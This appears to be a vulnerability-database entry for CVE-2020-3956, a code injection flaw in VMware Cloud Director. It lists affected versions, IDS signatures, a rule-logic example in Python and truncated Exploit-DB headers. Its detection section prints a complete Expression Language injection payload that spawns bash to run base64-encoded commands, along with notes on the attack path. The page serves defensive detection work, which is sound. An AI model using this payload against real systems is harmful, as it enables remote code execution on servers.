CVE-2020-3956
Published 2020-05-20
CVE-2020-3956: VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading…
Priority P273 · high · 8.8 CVSS 3.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EXPLOIT
EPSS 21.10% (97.3rd percentile)
VMware Cloud Director 10.0.x before 10.0.0.2, 9.7.0.x before 9.7.0.5, 9.5.0.x before 9.5.0.6, and 9.1.0.x before 9.1.0.4 do not properly handle input leading to a code injection vulnerability. An authenticated actor may be able to send malicious traffic to VMware Cloud Director which may lead to arbitrary remote code execution. This vulnerability can be exploited through the HTML5- and Flex-based UIs, the API Explorer interface and API access.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vmware | vcloud_director | >= 10.0.0.0 < 10.0.0.2 | 10.0.0.2 |
| vmware | vcloud_director | >= 9.1.0.0 < 9.1.0.4 | 9.1.0.4 |
| vmware | vcloud_director | >= 9.5.0.0 < 9.5.0.6 | 9.5.0.6 |
| vmware | vcloud_director | >= 9.7.0.0 < 9.7.0.5 | 9.7.0.5 |
Detection & IOCs (extracted from sources)
command: ${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}
cookie: vcloud_jwt=
bytes: |3a|Host|3e 24 7b|
bytes: .getDeclaredConstructors|28 29 5b|
snort (sid:2030240, inbound attempt):
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_server; flowbits:set,ET.20203956; http.method; content:"PUT"; http.cookie; content:"vcloud_jwt="; startswith; http.request_body; content:"|3a|Host|3e 24 7b|"; content:".getDeclaredConstructors|28 29 5b|"; distance:0; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030240; rev:2; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, updated_at 2024_03_14;)
snort (sid:2030241, outbound response):
alert http $HTTP_SERVERS any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)"; flow:established,to_client; flowbits:isset,ET.20203956; http.stat_code; content:"400"; http.response_body; content:"<Error"; content:"has|20|invalid|20|length|20|for"; fast_pattern; reference:url,citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/; classtype:attempted-admin; sid:2030241; rev:3; metadata:affected_product VMware, attack_target Server, created_at 2020_06_02, cve CVE_2020_3956, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_14;)
- The exploit is delivered via an HTTP PUT request to the vCloud Director admin API email settings endpoint, injecting an Expression Language payload as the SMTP host name value.
- Requests carry the 'vcloud_jwt' session cookie and the 'x-vcloud-authorization' header; monitor for PUT requests to /api/admin/ paths bearing these headers alongside EL injection patterns.
- A successful exploitation attempt can be detected by a 400 HTTP response containing '<Error' and the string 'has invalid length for' in the response body, paired with the ET.20203956 flowbit being set on the same flow.
- The exploit can be triggered through the HTML5-based UI, the Flex-based UI, the API Explorer interface and direct API access; monitor all four attack surfaces.
- The exploit uses base64-encoded commands piped through bash to evade simple string matching; look for base64 decode patterns in HTTP request bodies alongside the EL injection template.
- The exploit requires valid authenticated credentials; unauthenticated exploitation is not possible. The threat actor must be an authenticated user of the VMware Cloud Director instance.
- The Snort rules use flowbits (ET.20203956) to correlate inbound exploit attempts with outbound error responses; both rules (sid:2030240 and sid:2030241) must be active together for full detection coverage.
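To make the two-rule correlation concrete, here is an added example (not from this page, Emerging Threats or VMware) that re-expresses the match logic of sid:2030240 and sid:2030241 in Python, with a set standing in for the ET.20203956 flowbit. The XML element names and the error message wording in the sample traffic are constructed stand-ins; only the byte patterns come from the rules.

```python
# Added example: the two ET rules' content matches plus flowbit correlation,
# so the request half and the response half can be tested against sample traffic.

# Decoded from the rules' hex: "|3a|Host|3e 24 7b|" and "|28 29 5b|".
HOST_EL_OPEN = b":Host>${"
CONSTRUCTORS_CALL = b".getDeclaredConstructors()["
COOKIE_PREFIX = b"vcloud_jwt="


def request_matches(method, cookie, body):
    """sid:2030240: PUT, cookie header starting with vcloud_jwt= (startswith),
    request body holding both byte patterns with the second after the first (distance:0)."""
    if method != b"PUT" or not cookie.startswith(COOKIE_PREFIX):
        return False
    first = body.find(HOST_EL_OPEN)
    if first < 0:
        return False
    return body.find(CONSTRUCTORS_CALL, first + len(HOST_EL_OPEN)) >= 0


def response_matches(status, body):
    """sid:2030241: HTTP 400 whose body carries '<Error' and
    'has invalid length for' (the |20| bytes in the rule are spaces)."""
    return status == 400 and b"<Error" in body and b"has invalid length for" in body


class FlowCorrelator:
    """flowbits:set on the request side, flowbits:isset on the response side,
    keyed by whatever flow identifier the caller uses (e.g. a 5-tuple)."""

    def __init__(self):
        self.flagged = set()  # flow ids with the ET.20203956 bit set

    def on_request(self, flow_id, method, cookie, body):
        if request_matches(method, cookie, body):
            self.flagged.add(flow_id)
            return "attempt"
        return None

    def on_response(self, flow_id, status, body):
        if flow_id in self.flagged and response_matches(status, body):
            return "possible-success"
        return None


# Constructed sample traffic (not a capture): element names and message text are invented.
SAMPLE_REQ_BODY = b'<ns:SmtpSettings><ns:Host>${"".getClass().getDeclaredConstructors()[0]}</ns:Host></ns:SmtpSettings>'
SAMPLE_RESP_BODY = b'<Error minorErrorCode="BAD_REQUEST" message="value has invalid length for Host"/>'
BENIGN_BODY = b"<ns:SmtpSettings><ns:Host>smtp.example.test</ns:Host></ns:SmtpSettings>"
```

A benign PUT to the same endpoint never sets the flowbit, so a later 400 on that flow does not fire the second rule, which is why sid:2030241 on its own is not a detection.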
CVSS provenance
NVD v3.1: 8.8 HIGH · CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
NVD v2.0: 6.5 MEDIUM · AV:N/AC:L/Au:S/C:P/I:P/A:P
GHSA
GHSA-6m5g-75wx-jxgj: VMware Cloud Director 10
ghsa_unreviewed · 2022-05-24 · CVE-2020-3956 [MEDIUM] · CWE-74
VMware
VMSA-2020-0010: VMware Cloud Director updates address Code Injection Vulnerability (CVE-2020-3956)
vendor_vmware · 2020-05-19 · CVE-2020-3956 [HIGH] · CVSS 8.8
VMware Cloud Director does not properly handle input leading to a code injection vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8.
CVEs: CVE-2020-3956
Suricata
ET EXPLOIT Possible Successful VMware Cloud Director RCE Attempt (CVE-2020-3956)
suricata · 2020-06-02 · CVE-2020-3956 [HIGH] · CVSS 8.8 · sid:2030241 (full rule listed under Detection & IOCs above)
Suricata
ET EXPLOIT Possible VMware Cloud Director RCE Attempt (CVE-2020-3956)
suricata · 2020-06-02 · CVE-2020-3956 [HIGH] · CVSS 8.8 · sid:2030240 (full rule listed under Detection & IOCs above)
Exploit-DB
VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
exploitdb · 2020-06-04 · CVE-2020-3956 [HIGH] · CVSS 8.8
---
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
#!/usr/bin/python
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.vers
Exploit-DB
vCloud Director 9.7.0.15498291 - Remote Code Execution
exploitdb · 2020-06-02 · CVE-2020-3956 [HIGH] · CVSS 8.8
---
#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urlli
Checkpoint
8th June – Threat Intelligence Bulletin
blogs_checkpoint · 2020-06-08 · CVE-2019-19781 [CRITICAL] · CVSS 9.8
## 8th June – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 8th June 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Westech, a US military missile contractor, has been hit by the Maze ransomware after threat actors compromised its network and stole confidential documents from it. It is suspected that the hackers are of Russian origin, and that they may attempt to sell the stolen data to a foreign state.
Check Point SandBlast and Anti-
Checkpoint
25th May – Threat Intelligence Bulletin
blogs_checkpoint · 2020-05-25 · CVE-2020-0915
## 25th May – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 25th May 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
Thousands of Israeli websites have been defaced in an Anti-Israeli Campaign carried out by the “Hacker of Savior” group. All websites were hosted on a local Israeli hosting company called uPress, and the attackers centrally exploited a vulnerability in a WordPress plugin to publish an anti-Israeli message on the websites’
References
- http://packetstormsecurity.com/files/157909/vCloud-Director-9.7.0.15498291-Remote-Code-Execution.html
- https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
- https://github.com/aaronsvk/CVE-2020-3956
- https://www.vmware.com/security/advisories/VMSA-2020-0010.html
Published 2020-05-20